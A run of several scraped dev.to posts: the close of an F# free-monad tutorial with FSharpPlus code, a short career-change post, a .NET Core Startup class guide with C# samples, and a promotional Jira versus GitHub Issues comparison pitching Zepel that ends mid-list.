You might be wondering whether to use free monads in F# in your project. On the one hand they provide an excellent means of abstraction when it comes to defining computations in a domain model. They're also a joy to test because we can just interpret them as pure data and verify that for a given set of inputs we have produced the right data structure and hence computation; no more mocking 🙌.
Another plus is that with free monads we've actually achieved what object oriented programmers would call the interface segregation principle. Each computation only has access to the operations it needs to do its work. No more injecting wide interfaces into domain handlers and then having to write tests that verify we didn't call the wrong operation; it's literally impossible under this design!
On the other hand it seems to be pushing F# to the limits as it technically requires features like higher-kinded types, which F# doesn't technically support. So we have to resort to making heavy use of statically resolved type parameters to make it work. You might also find them to be quite abstract, although I hope that this post has at least helped to make their usage seem more intuitive, even if the internal implementation is still quite abstract.
On balance I don't think there's a one-size-fits-all answer here. You're going to have to weigh up the pros and cons for your project and team and decide whether this level of purity is worth it in order to warrant overcoming the initial learning curve and potentially cryptic compiler errors when things don't line up.
If you're thinking of taking the plunge and giving them a try then I would recommend using [FSharpPlus](https://fsprojects.github.io/FSharpPlus/reference/fsharpplus-data-free.html) which has done all the hard work of defining the free monad machinery for you. Also see the appendix at the end for a full example using FSharpPlus.
# What did we learn 🧑🎓
The name free monad, might be cryptic and even misleading at first, but the concept is relatively straight forward. Free monads are just a data structure that represents a chain of computations that should be run sequentially. By building a data structure we're able to leave it up to someone else to come along and interpret it in anyway they see fit. They’re “free” to do it how they need to providing they respect the ordering of the computations in the data structure we have handed to them.
A free monad is just a way for us to describe our computation in very abstract terms. We're placing the fewest restrictions possible on what the computation has to do and making no assumptions about how it should be done. We've completely decoupled the "what" from the "how", which is one of the fundamental pillars of good Domain Driven Design, because it means that the domain model is a pure abstract representation of the problem at hand unburdened by the details of how it is hosted.
# Next time ⏭
We've covered a lot in this post but we haven't talked about how we actually go about running these computations. So far we've just built some abstract representations of them in data. Next time we'll see how we can actually interpret them to do some real work.
## Appendix
If you want to see a complete, top-to-bottom, example of writing a free monadic workflow using FSharpPlus, then I've included one in the section below.
{% details %}
```fsharp
#r "nuget: FSharpPlus"
open FSharpPlus
open FSharpPlus.Data
type ChargeUserOperation<'next> =
| LookupUser of UserId * (User -> 'next)
| ChargeCreditCard of (float * CreditCard) * (TransactionId -> 'next)
| EmailReceipt of TransactionId * (TransactionId -> 'next)
static member Map(op, f) =
match op with
| LookupUser (x, next) -> LookupUser(x, next >> f)
| ChargeCreditCard (x, next) -> ChargeCreditCard(x, next >> f)
| EmailReceipt (x, next) -> EmailReceipt(x, next >> f)
let lookupUser userId = LookupUser(userId, id) |> Free.liftF
let chargeCreditCard amount card =
ChargeCreditCard((amount, card), id) |> Free.liftF
let emailReceipt email =
EmailReceipt(email, id) |> Free.liftF
let chargeUser (amount: float) (userId: UserId) =
monad {
let! user = lookupUser userId
let! transactionId = chargeCreditCard amount user.CreditCard
match user.EmailAddress with
| Some emailAddress ->
do!
emailReceipt
{ To = emailAddress
Body = $"TransactionId {transactionId}" }
return transactionId
| None -> return transactionId
}
```
When writing the smart constructors here, e.g `lookUser` we pass the identity function, `id`, as the second argument. The reason for this is because `Free.liftF` maps the functor with `Pure` and then lifts it up with `Roll`. So by using `id` and then writing `Free.liftF` we end up with the desired `Roll (LookupUser(userId, Pure))`. The other way to think of `id` here is that the default "callback" when creating an operation is to just return the value produced by this computation and not do anything else.
{% enddetails %} | choc13 |
695,298 | Answer: | answer re: What does 256 means for 12... | 0 | 2021-05-11T22:56:52 | https://dev.to/nonsameer/answer-3fpl | ---
title: Answer:
published: true
---
{% stackoverflow 38483586 %} | nonsameer | |
695,417 | You're Hired! | I was near tears when I heard those words from my new manager. After months and months of... | 12,672 | 2021-05-17T16:23:00 | https://corydorfner.com/youre-hired | career, beginners, learning, motivation | I was near tears when I heard those words from my new manager. After months and months of self-learning, both about myself and programming, I finally have my first job in the tech field and can happily say I made the switch from a career in Manufacturing Quality to Technology.

Starting May 24<sup>th</sup>, my new title will be that of a Software Test Engineer for Cox Automotive. Now, I know what you're thinking, "Cory, your social media says you're a Full-Stack Developer. Why are you happy with a Software Test Engineer role?". Well, there are numerous reasons for that, such as the fact that I'm less than a year into my career path transformation, I've found a great company to work for, and understand that there is a lot more for me to learn and grow from within the tech industry itself. I will go into further detail on all of these points, and more, within the other posts of this series, so be sure to stick around and read them when they come out. One key item to remember when reading through these though; I'm not done yet.

There will always be more to learn about in this industry, different ways to grow and develop yourself as an individual and programmer, and a better way to approach and solve issues that we must master. This is what makes us engineers and what we must tackle day in and day out with an optimistic and joyful mindset. Without these key values in our life, we're certain to fall behind the next person and be overlooked in our careers so it's vital to be continually improving. The keyword here is *continually*. Most people think they have to be *continuously* improving, but that frequently leads to stress, burnout, and overall poor results. By *continually* improving, you provide yourself with sufficient breaks and pauses to relax and enjoy life. Ralph Waldo Emerson once said, "Life is a journey, not a destination". I strive to live my life every day by the message of his quote.
While I work hard and push myself to get things done quickly and correctly, I never put my mental health and sanity over that of studying and work. This is what I would like each and every one of you to take away from this series. It's never too late or difficult to follow your dreams and make them a reality. It of course will take hard work and dedication, but you can get there, just like I have and will continue doing.

Be sure to stay tuned for the next post in the series by following me here and on social media too! The links to my social media accounts can be found on the [contact page](https://corydorfner.com/contact/) of my personal website. Thank you and I look forward to your comments below!:wave:
| dorf8839 |
695,584 | .Net Core Startup Class Guide | The Startup class is a single place to configure services and the app's request pipeline.... | 0 | 2021-05-12T05:17:13 | https://medium.com/c-sharp-progarmming/net-core-startup-class-guide-27b1d3232b67 | csharp, dotnet, todayilearned, programming | #### The Startup class is a single place to configure services and the app's request pipeline.
#### The Startup class explained as follows:
- It contains an optional **Configure Services** method to configure app services. A service is a reusable module that provides functionality.
- Need to register services in the **Configure Services** method and consumed throughout the application via **dependency injection**.
- Includes a Configure method to build the app’s request processing pipeline.
**ConfigureServices** and **Configure** are called by the **.NET Core runtime** when the app begins executing:
```
public class Startup
{
public Startup(IConfiguration configuration)
{
Configuration = configuration;
}
public IConfiguration Configuration { get; }
public void ConfigureServices(IServiceCollection services)
{
services.AddRazorPages();
}
public void Configure(IApplicationBuilder app, IWebHostEnvironment env)
{
if (env.IsDevelopment())
{
app.UseDeveloperExceptionPage();
}
else
{
app.UseExceptionHandler("/Error");
app.UseHsts();
}
app.UseHttpsRedirection();
app.UseStaticFiles();
app.UseRouting();
app.UseAuthorization();
app.UseEndpoints(endpoints =>
{
endpoints.MapRazorPages();
});
}
}
```
Specify the Startup class in the app’s host built. The Startup class is typically defined by calling the `WebHostBuilderExtensions.UseStartup<TStartup>` method on the host builder inside the Program.cs file as shown below.
```
public class Program
{
public static void Main(string[] args)
{
CreateHostBuilder(args).Build().Run();
}
public static IHostBuilder CreateHostBuilder(string[] args) =>
Host.CreateDefaultBuilder(args)
.ConfigureWebHostDefaults(webBuilder =>
{
webBuilder.UseStartup<Startup>();
});
}
```
The host provides services that are accessible to the Startup class constructor. The app attaches additional services via the ConfigureServices method. Both the host and app services are available to Configure and throughout the app.
The following services can be injected into the Startup class constructor:
- IWebHostEnvironment
- IHostEnvironment
- IConfiguration
### Multiple Startup Classes
At runtime, the appropriate Startup class is selected when the app defines separate Startup classes for various environments.
The class whose name matches the current environment is prioritized. For example, if the app includes both a **Startup** class and a **StartupDevelopment** class, and the app is running in the Development environment, then the **StartupDevelopment** class will be used.
### The ConfigureServices method
The ConfigureServices method is:
- Optional.
- To configure the app’s services.
- To set configuration options.
```
public class Startup
{
public Startup(IConfiguration configuration)
{
Configuration = configuration;
}
public IConfiguration Configuration { get; }
public void ConfigureServices(IServiceCollection services)
{
services.AddDbContext<ApplicationDbContext>(options =>
options.UseSqlServer(
Configuration.GetConnectionString("DefaultConnection")));
services.AddDefaultIdentity<IdentityUser>(
options => options.SignIn.RequireConfirmedAccount = true)
.AddEntityFrameworkStores<ApplicationDbContext>();
services.AddRazorPages();
}
```
### The Configure method
The Configure function is used to specify how the app responds to different HTTP requests. The pipeline is configured by adding middleware components.
The .NET Core templates configure the pipeline with support for:
- Developer Exception Page
- Exception handler
- HTTP Strict Transport Security (HSTS)
- HTTPS redirection
- Static files
- ASP.NET Core MVC and Razor Pages
```
public class Startup
{
public Startup(IConfiguration configuration)
{
Configuration = configuration;
}
public IConfiguration Configuration { get; }
public void ConfigureServices(IServiceCollection services)
{
services.AddRazorPages();
}
public void Configure(IApplicationBuilder app, IWebHostEnvironment env)
{
if (env.IsDevelopment())
{
app.UseDeveloperExceptionPage();
}
else
{
app.UseExceptionHandler("/Error");
app.UseHsts();
}
app.UseHttpsRedirection();
app.UseStaticFiles();
app.UseRouting();
app.UseAuthorization();
app.UseEndpoints(endpoints =>
{
endpoints.MapRazorPages();
});
}
}
```
Each **Use** extension method can be used to add more than one middleware components to the pipeline. For example, the UseStaticFiles method tells the middleware to serve static files.
Each middleware component in the pipeline is responsible for invoking the next element in the channel, if appropriate.
Additional services, such as
- IWebHostEnvironment
- ILoggerFactory
- Anything defined in ConfigureServices
#### Configure services without Startup
Configure services and the request processing pipeline without using a Startup class, call ConfigureServices, and Configure convenience methods on the host builder.
Multiple calls to ConfigureServices append to one another. If multiple Configure method calls exist, the last Configure call is used.
```
public class Program
{
public static void Main(string[] args)
{
CreateHostBuilder(args).Build().Run();
}
public static IHostBuilder CreateHostBuilder(string[] args) =>
Host.CreateDefaultBuilder(args)
.ConfigureAppConfiguration((hostingContext, config) =>
{
})
.ConfigureWebHostDefaults(webBuilder =>
{
webBuilder.ConfigureServices(services =>
{
services.AddControllersWithViews();
})
.Configure(app =>
{
var loggerFactory = app.ApplicationServices
.GetRequiredService<ILoggerFactory>();
var logger = loggerFactory.CreateLogger<Program>();
var env = app.ApplicationServices.GetRequiredService<IWebHostEnvironment>();
var config = app.ApplicationServices.GetRequiredService<IConfiguration>();
logger.LogInformation("Logged in Configure");
if (env.IsDevelopment())
{
app.UseDeveloperExceptionPage();
}
else
{
app.UseExceptionHandler("/Home/Error");
app.UseHsts();
}
var configValue = config["MyConfigKey"];
});
});
});
}
```
#### You have learned
- Startup class methods and their description.
- Multiple startup classes as per the environment.
- Create a .Net Core build without Startup class.
**Thank you for reading. I hope you like the article..!!**
<a href="https://www.buymeacoffee.com/sukhpindersingh" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 41px !important;width: 174px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a> | ssukhpinder |
695,707 | Jira vs GitHub Issues: Which is better for issue tracking? | If GitHub is where developers reside, Jira is what most software development teams use to keep tabs o... | 0 | 2021-05-12T08:55:58 | https://zepel.io/blog/jira-vs-github/ | projectmanagement, tooling, agile, productivity | If GitHub is where developers reside, Jira is what most software development teams use to keep tabs on their progress.
Both these tools have become a household name when it comes to tracking issues and managing projects. So, how are they different? What are their pros and cons? And ultimately, which [project management software](https://zepel.io/blog/free-project-management-software/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) is better for your software development team?
Before we get to answering these questions, let's have a quick overview of the two issue tracking project management apps.
---
## Quick Overview of Jira
Atlassian created Jira in the year 2002 and it was initially built to be an issue and bug tracking application.

Now, Jira software has grown into an agile project management tool catering to software development teams - small and big. Jira offers a plethora of functionalities and integrations to more than 2000 third-party applications. Yet, its USP remains the same till date - issue tracking.
Most teams that are new to project management get started with Atlassian's Trello. And once they require more functionality, they later move to Jira after comparing [Trello vs Jira](https://zepel.io/blog/jira-vs-trello/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github).
Since most software companies are opting for Jira, should you too? Let’s find out.
### The pros and the cons of Jira
Although Jira software is a pioneer in project management tools, with most apps being modelled on it, it has its pros and cons.
#### The pros:
- Atlassian’s Jira is an expert at capturing bugs in your product that can then be assigned to members, prioritized and tracked to completion.
- Jira software lets you add story points to each issue to quantify the work required to be done and also group related issues using its Epic issue type
- Jira software has agile capabilities that supports frameworks such as [scrum and kanban](https://zepel.io/agile/scrum-vs-kanban/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) with features like scrum and [kanban boards](https://zepel.io/agile/kanban/what-are-kanban-boards/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github).
- Jira is flexible and has a workflow builder that enables you to customize your workflow by setting up rules to define how a work item should move from one status to another.
- Advanced configurations help you control who can view what work items in which kanban columns.
- Roadmap functionality aids in a quick overview of the entire project and to track overall progress.
- A huge collection of more than 2000 third-party apps for use cases ranging from CRM to code review, and more.
#### The cons:
- Jira software’s design is not a developer’s favourite as it appears to be streamlined on the outside but leads to micromanagement when you dive inside.
- Most developers also hate this app for its slow speed.
- Jira software’s primary unit of work is an issue and not a task which is terrible as you’ll only think of tickets and not features.
- Jira’s agile capabilities lack finesse when it comes to implementing frameworks like scrum, unlike Zepel. You don’t get the elegant [Sprints](https://zepel.io/features/sprints/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) view that has built-in agile reports such as burnup and [burndown](https://zepel.io/agile/reports/burndown/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) charts. So, check out alternative [scrum tools](https://zepel.io/blog/scrum-tools/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) if it is your priority.
- Jira software’s learning curve is steep, making onboarding new members a living hell.
- If you fail to set advanced configurations right, miscommunication and lost productivity within your squad can occur.
- Jira software enables you to collect bugs and support tickets from customers via its external service desk but doesn’t allow you to bring in tickets from various customer feedback platforms such as Canny, Intercom, etc., like [Zepel’s Streams](https://zepel.io/guide/streams/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) does.
- Even though you can create customized workflows, creating it becomes a nightmare due to its complex design.
- The [pricing plan](https://www.atlassian.com/software/jira/pricing) limits onboarding to only 10 members in the free plan and unlike Zepel, it comes with certain functionality restrictions.
<a href="https://zepel.io/?utm_source=devto&utm_medium=mid-image&utm_campaign=jira-vs-github" class="import-image"><img src="https://zepel.io/blog/content/images/2021/05/CTA-1.png" alt="Zepel, dev-friendly project management tool that's more than an issue tracker" style="max-width:700px;width:100%;"></a>
---
## Quick Overview of GitHub Issues
Joining as a recent addition to the list of [Jira alternatives](https://zepel.io/blog/jira-alternative/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) is GitHub. This tool is every developer's best friend; the platform where most of the product development and code collaboration happens.
Popularly known for source code management, now, GitHub has expanded its horizons from version control systems to project management. And it is rising to fame as a popular replacement to Jira as it can do most of what Jira can do. And moreover, it's where the code is.

Akin to Jira software, this app uses bug tracking as a means of measuring progress. So, instead of thinking in terms of tasks and features, you will be working on tickets. Although this approach might seem simpler, it can become very difficult to build quality software.
Therefore, is GitHub cut out for handling projects? Read on to find out.
### Pros and Cons of GitHub Issues for Project Management
Just like any other app, GitHub also has its pros and cons that will help you decide if this is the app for your org.
#### The pros:
- GitHub is where the code is and so you wouldn’t need to leave your current workflow to update your work item’s status.
- GitHub’s project boards have useful templates such as basic kanban, automated kanban, automated kanban with triggers for PR review status to help prioritize work and customize workflows. *[Here are some kanban board examples for inspiration](https://zepel.io/blog/9-kanban-board-examples/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github).*
- GitHub Actions enables you to automate all your workflows effortlessly.
- GitHub can be integrated with almost every software application available in the market today.
- GitHub’s [pricing plan](https://github.com/pricing) is quite affordable.
#### The cons:
- Unlike Jira software and Zepel, GitHub lacks powerful agile capabilities other than simple kanban software and Milestones for scrum.
- Traditional project management functionalities such as file sharing and messaging, customizable dashboards, and multiple views like Gantt/Timeline, List view, etc
- GitHub Issues helps collect customer requests for features, enhancements, or fixing bugs. You can even bring them in as imports from external sources like Canny and Intercom. But it isn't as elegant as Zepel’s Streams.
- Unlike Atlassian’s Jira, GitHub doesn’t have story points to capture and quantify the work required to be completed
- GitHub’s way of grouping issues together using labels or milestones is poor in comparison to Jira software’s Epic
Lack of permissions that help you control who has access to what data.
- GitHub isn’t friendly to non-technical people as it isn't intuitive and so it isn't meant for cross-functional teams.
- Although the pricing is affordable, only public repositories are free.
---
## Feature Comparison of Jira vs GitHub
<table class="tg" style="undefined;table-layout: fixed; width: 100%;">
<colgroup>
<col style="width: 111px">
<col style="width: 302px">
<col style="width: 326px">
</colgroup>
<thead>
<tr>
<th class="tg-0lax"></th>
<th class="tg-amwm"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Jira Software</span></th>
<th class="tg-amwm"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">GitHub</span></th>
</tr>
</thead>
<tbody>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Agile planning</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Jira provides agile capabilities such as </span><a href="https://zepel.io/features/scrum-board/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github" target="_blank" rel="noopener noreferrer"><span style="font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent">scrum</span></a><br><a href="https://zepel.io/features/scrum-board/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github" target="_blank" rel="noopener noreferrer"><span style="font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent">boards</span></a><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">, </span><a href="https://zepel.io/features/kanban-board/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github" target="_blank" rel="noopener noreferrer"><span style="font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent">kanban boards</span></a><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">, </span><a href="https://zepel.io/agile/reports/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github" target="_blank" rel="noopener noreferrer"><span style="font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent">agile reports</span></a><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">, etc., to</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">implement both scrum and kanban painlessly.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">GitHub lacks powerful agile capabilities like Jira</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">and </span><span style="color:#000;background-color:transparent">offers only simple kanban boards and</span><br><span style="color:#000;background-color:transparent">Milestones for scrum sprints.</span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Ease of use</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Easy to set up and use but the user</span><br><span style="color:#000;background-color:transparent">experience and onboarding is hellish due to</span><br><span style="color:#000;background-color:transparent">the complexity in its design.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Easy to use for developers and engineering teams</span><br><span style="color:#000;background-color:transparent">but difficult for new technical users and non</span><br><span style="color:#000;background-color:transparent">technical members as it isn't intuitive.</span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Developer-</span><br><span style="color:#000;background-color:transparent">friendliness</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Atlassian Jira enables pretty deep integrations</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">with GitHub, GitLab, and Bitbucket. However,</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">it is extremely slow. Also, its workflows are</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">over-engineered, causing micromanagement.</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">This makes jira a tool developers hate. </span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">GitHub is a tool loved by developers as it's where</span><br><span style="color:#000;background-color:transparent">they spend most of their time doing what they love</span><br><span style="color:#000;background-color:transparent">- coding. And managing work items here is a</span><br><span style="color:#000;background-color:transparent">bonus as they don’t need to leave their current</span><br><span style="color:#000;background-color:transparent">workflow.</span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Features &</span><br><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">functionality</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">The core functionality of Jira is bug tracking</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">and its unit of work is a ticket. You can add</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">story points to issues and group them using its</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">epic issue type, unlike GitHub. But its core</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">concept forces your team to think in terms of</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">tickets instead of outcomes. </span><br><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">When it comes to features, Jira has plenty of</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">them - from multiple views to roadmap and</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">custom dashboards.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Akin to Jira, GitHub is also based on tickets,</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">leading </span><span style="color:#000;background-color:transparent">to a similar problem. Whereas tools like</span><br><span style="color:#000;background-color:transparent">Zepel help you prioritize and build customer</span><br><span style="color:#000;background-color:transparent">focussed software. But even when it comes to</span><br><span style="color:#000;background-color:transparent">issue tracking, GitHub lacks crucial functionalities</span><br><span style="color:#000;background-color:transparent">such as story points and proper grouping</span><br><span style="color:#000;background-color:transparent">methods. </span><br><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">In terms of features, this app doesn’t offer</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">traditional </span><span style="color:#000;background-color:transparent">project management functionalities such</span><br><span style="color:#000;background-color:transparent">as multiple views, file sharing, and messaging. It</span><br><span style="color:#000;background-color:transparent">also lacks custom dashboards. </span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Customer</span><br><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">requests</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Atlassian Jira has an external service desk to</span><br><a href="https://zepel.io/blog/customer-feedback-and-ways-to-collect/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github" target="_blank" rel="noopener noreferrer"><span style="font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent">collect customer feedback</span></a><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent"> but does not</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">support bringing in tickets from other external</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">tools such as Canny, Intercom, etc., like</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Zepel’s Streams does.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">GitHub Issues can collect customer feedback and</span><br><span style="color:#000;background-color:transparent">also enables bringing them in from other platforms</span><br><span style="color:#000;background-color:transparent">but only via imports.</span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Flexibility &</span><br><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">customizability</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Jira’s workflow builder allows you to create</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">customized workflows making it flexible.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">GitHub may not have a powerful workflow builder</span><br><span style="color:#000;background-color:transparent">but it has Actions and project boards to help</span><br><span style="color:#000;background-color:transparent">automate and customize your workflows efficiently.</span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Integrations</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Whopping 2000+ third-party apps and add-ons</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">are available.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Integrations available with almost every software</span><br><span style="color:#000;background-color:transparent">application in the market today.</span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Pricing</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Atlassian Jira's free plan limits the no. of users</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">to 10 and also limits functionalities. The paid</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">plans start at </span><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">$7/user</span><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">GitHub has a free version but only for public</span><br><span style="color:#000;background-color:transparent">repositories and with feature limits. So, for private</span><br><span style="color:#000;background-color:transparent">repos and access to more functionalities, you must</span><br><span style="color:#000;background-color:transparent">choose either the Teams plan that starts at</span><br><span style="font-weight:700;color:#000;background-color:transparent">$4/user/month</span><span style="color:#000;background-color:transparent"> or the enterprise plan at</span><br><span style="font-weight:700;color:#000;background-color:transparent">$21/user/month</span><span style="color:#000;background-color:transparent">. </span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Best for</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Small to large SaaS enterprises. </span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Small software development teams. </span></td>
</tr>
</tbody>
</table>
---
## 3 Reasons why issue tracking isn't the ideal solution to project management
### 1. Customer needs can’t be boiled down to a two-line ticket
Perhaps the most important requirement for building customer-focussed software products is context. And that’s why teams put in so many hours of efforts to understand the customer’s needs. So, when you try to compress all the information you’ve gathered about your customer’s requirements into a two-line ticket, what's the end product going to look like? There’s certainly going to be an information gap between the product and the engineering teams.
### 2. Developers aren’t ticket movers
Having worked with developers, you’d know one thing for sure; they love building features and hate the managing part i.e dragging and dropping tickets across the progress-tracking board. So, expecting them to be ticket movers rather than creators, who love to build software, is going to suck up their drive to improve the product. And bid adieu to quality.
### 3. Issue tracking hurts development
If bug tracking is the core of your project management, the quality of the software product is bound to take a big hit. Because your team will only look at building features as clearing tickets leaving no room for innovation. Moreover, there will be a lot of misunderstandings during product-engineering handoffs due to lack of context and clarity regarding the end goal. Also, there’s a lack of clarity on how efficiently the feature must function when your sole focus is on solving tickets. And that's how [issue tracking hurts development](https://zepel.io/blog/how-issue-tracking-hurts-development/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github).
The bottom line is that when it comes to capturing bugs, both GitHub Issues and Atlassian Jira are top-notch. But they fail to meet the criteria of a good project management software as there’s only so much you can do with tickets as your unit of work; you can only mend and not build.
<a href="https://zepel.io/solutions/engineering/?utm_source=devto&utm_medium=mid-image&utm_campaign=jira-vs-github" class="import-image"><img src="https://zepel.io/agile/content/images/2021/04/img-1-2.png" alt="Zepel, dev-friendly project management tool for engineering teams" style="max-width:700px;width:100%;"></a>
---
## 3 best alternatives to Jira and GitHub that are a better fit for your org
### 1. Zepel
Zepel is the perfect alternative to both the tools. And it can be the right app for your org as it is more than just a bug tracker.

It is a clutter-free project management app that doesn't focus just on tickets. Instead, it helps you prioritize and build customer-focussed software.
Zepel has powerful agile capabilities that supports the implementation of scrum, kanban, or even a combination of both effortlessly.
Zepel's USP is its developer-friendly aspects such as deep integrations with [GitLab](https://zepel.io/integrations/gitlab/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github), [Bitbucket](https://zepel.io/integrations/bitbucket/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github), and even [GitHub](https://zepel.io/integrations/github/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github), markdown support, `/` commands, and [automated Git workflows](https://zepel.io/guide/integrations/setup-git-workflow-automation/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github). On setting up these Git workflow automations, Zepel will perform status updates on your dev crew’s behalf. You can complete this workflow by connecting your Slack to it and receive real-time notifications of progress updates by your squad. This is why Zepel is the widely-preferred [engineering project management software](https://zepel.io/solutions/engineering/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github).
You can onboard squads of any size painlessly owing to its uncomplicated design and affordable pricing.
**Key Highlights:**
- Intuitive, uncomplex, powerful UI that makes onboarding easy
